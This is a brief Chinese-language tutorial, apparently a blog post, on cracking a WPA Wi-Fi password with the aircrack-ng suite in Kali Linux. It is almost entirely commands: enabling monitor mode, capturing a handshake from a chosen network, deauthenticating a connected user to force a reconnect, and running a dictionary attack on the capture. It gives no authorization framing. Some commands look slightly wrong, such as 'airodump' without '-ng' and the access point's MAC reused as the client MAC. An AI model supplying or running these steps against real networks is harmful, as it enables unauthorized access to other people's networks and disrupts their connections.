首先电脑插入USB无线网卡
然后通过VMware里面 虚拟机 > 可移动设备 选择我们的无线网卡连接,如下图:
step1: 查看网卡有没有加载进来
root@kali:~# iwconfig
注:iwconfig是查看无线网卡,ifconfig 是查看有线网卡
step2: 开启无线网卡的侦听功能
root@kali:~# airmon-ng start wlan0
此时需要再次查看下网卡:
step3:侦听附近的wifi信号
root@kali:~# airodump-ng wlan0mon
如果出现无法侦听数据,重启一下服务,命令如下:
root@kali:~# airmon-ng check kill
step4: 选择你要破解的无线网络(ssid),抓取握手包
root@kali:~# airodump -c 1 --bssid B0:E1:7E:7D:EA:CC -w secevery wlan0mon
此时如果有人连接这个wifi,就会产生握手包,我们就会抓到这个握手包,但是运气并不是那么好,如上图所示一直没有抓到握手包,因此我们就要手动的踢掉一个人的wifi,这样它就会再次自动连接wifi,产生一个握手吧,这样我们就抓到了握手包。具体来看下一步:
step5:抓不到握手报文,需要模拟station,进行攻击
# aireplay-ng -0 10 -a bssid -c station mac wlan0mon
# aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon
root@kali:~# aireplay-ng -0 10 -a B0:E1:7E:7D:EA:CC -c B0:E1:7E:7D:EA:CC wlan0mon
此时我们再去看刚才侦听握手包的窗口,发现已经抓到了握手包,如下图所示
然后查看一下当前目录下抓到的握手包secevery-01.cap
step6:破解报文,获得密码。 使用字典passwd.txt
root@kali:~# aircrack-ng -a2 -b B0:E1:7E:7D:EA:CC -w passwd.txt secevery-01.cap